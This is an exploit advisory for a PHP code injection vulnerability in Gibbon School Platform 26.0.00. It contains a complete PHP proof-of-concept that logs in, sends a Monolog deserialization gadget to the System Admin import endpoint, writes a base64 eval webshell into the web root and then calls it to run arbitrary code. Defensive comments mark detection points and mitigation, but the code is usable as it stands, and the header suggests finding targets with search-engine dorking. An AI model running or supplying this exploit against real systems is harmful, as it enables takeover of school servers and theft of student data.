Headline
Gibbon School Platform 26.0.00 Code Injection
Gibbon School Platform version 26.0.00 suffers from a PHP code injection vulnerability.
=============================================================================================================================================| # Title : Gibbon School Platform 26.0.00 Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://gibbonedu.org/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 108 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :
<?php

// Proof-of-concept client from the advisory above. Reviewer notes, defensive view:
// the PoC first logs in (gibbon_login), then sends one POST to the System Admin
// import endpoint whose `columnOrder` field carries a PHP-serialized object graph,
// and finally fetches a file it expects to have been written into the web root.
// Each of those three steps is a detection point (see the per-method comments).
// Mitigation is to move beyond the affected 26.0.00 release (confirm the fixed
// version with the vendor) and to keep System Admin accounts to a minimum.
class GibbonExploit
{
    private $target_uri;    // base URL of the instance; the paths below are appended to it
    private $username;      // credentials used by gibbon_login()
    private $password;
    private $webshell_name; // file name used in upload_webshell(); random letters + '.php' unless supplied

    /**
     * Store target and credentials; choose a random 10-letter '.php' name when none is given.
     * `?:` tests truthiness, so an empty string also falls back to the random name.
     */
    public function __construct($target_uri, $username, $password, $webshell_name = null)
    {
        $this->target_uri = $target_uri;
        $this->username = $username;
        $this->password = $password;
        $this->webshell_name = $webshell_name ?: $this->randomString() . '.php';
    }

    /**
     * Thin cURL wrapper. Returns the response body as a string, or false when curl_exec()
     * fails; callers do not tell the two apart. CURLOPT_SSL_VERIFYPEER is switched off,
     * so certificate errors on the target are ignored.
     */
    private function send_request($method, $url, $data = null, $headers = [])
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        if ($data) {
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        }
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        if (!empty($headers)) {
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        }
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    /**
     * POST the credentials to /login.php?timeout=true. gibbonSchoolYearID ('025') and
     * gibboni18nID ('0002') are hard-coded. This is the authenticated pre-condition of
     * the PoC: a failed attempt here appears as an ordinary login failure in the
     * application's own logs.
     */
    public function gibbon_login()
    {
        $login_url = $this->target_uri . '/login.php?timeout=true';
        $data = [
            'address' => '',
            'method' => 'default',
            'username' => $this->username,
            'password' => $this->password,
            'gibbonSchoolYearID' => '025',
            'gibboni18nID' => '0002'
        ];
        return $this->send_request('POST', $login_url, http_build_query($data));
    }

    /**
     * Build the form fields for the external-assessment import (sent urlencoded by the caller).
     * `columnOrder` is not a column list but a PHP serialized array naming
     * Monolog\Handler\SyslogUdpHandler and Monolog\Handler\BufferHandler (a known
     * unserialize() gadget shape) with $payload embedded as the buffered record; the
     * endpoint presumably hands this field to unserialize() — confirm against the
     * Gibbon 26.0.00 source. Detection: POST bodies to import_run.php whose columnOrder
     * contains an `O:` object marker.
     */
    private function construct_form_data($payload)
    {
        $payload_len = strlen($payload);
        $payload_data = 'a:2:{i:7;O:32:"Monolog\\Handler\\SyslogUdpHandler":1:{s:9:"\x00*\x00socket";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";r:3;s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;s:' . $payload_len . ':"' . $payload . '";s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}i:7;i:7;}';
        $form_data = [
            'address' => '/modules/System Admin/import_run.php',
            'mode' => 'sync',
            'syncField' => 'N',
            'syncColumn' => '',
            'columnOrder' => $payload_data,
            'columnText' => 'N;',
            'fieldDelimiter' => '%2C',
            'stringEnclosure' => '%22',
            'filename' => $this->randomString() . '.xlsx',
            'csvData' => '"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"',
            'ignoreErrors' => '1',
            'Failed' => 'Submit'
        ];
        return $form_data;
    }

    /**
     * Wrap $b64_payload in a shell command that writes a one-line PHP eval stub to
     * $this->webshell_name, embed it via construct_form_data() and POST it to
     * index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4.
     * Artefacts for a defender: a new .php file beside index.php, and — if the payload
     * runs — a shell launched from the PHP worker with `base64_decode` in its command line.
     */
    public function upload_webshell($b64_payload)
    {
        $php_payload = "echo \"<?php @eval(base64_decode('$b64_payload'));?>\" > " . $this->webshell_name;
        $form_data = $this->construct_form_data($php_payload);
        $url = $this->target_uri . '/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4';
        return $this->send_request('POST', $url, http_build_query($form_data));
    }

    /**
     * Base64-encode $cmd (PHP source), upload the stub, then GET it so the stub evaluates
     * the code. die()s when the upload response is empty or false. Returns the stub's
     * output (string|false).
     */
    public function execute_php($cmd)
    {
        $b64_payload = base64_encode($cmd);
        $res = $this->upload_webshell($b64_payload);
        if (!$res) {
            die('Web shell upload error.');
        }
        // execute the webshell
        $url = $this->target_uri . '/' . $this->webshell_name;
        return $this->send_request('GET', $url);
    }

    /**
     * $length distinct ASCII letters taken from a shuffled alphabet (str_shuffle is not a
     * CSPRNG and the result never repeats a letter). Indicator for the default name:
     * web-root files matching [A-Za-z]{10}\.php.
     */
    private function randomString($length = 10)
    {
        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);
    }
}

// Usage
// 'https://target-site.com' and the credentials below are the advisory author's placeholders.
$exploit = new GibbonExploit('https://target-site.com', '[email protected]', 'password');
$exploit->gibbon_login();
$response = $exploit->execute_php('phpinfo();');
echo $response;
Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================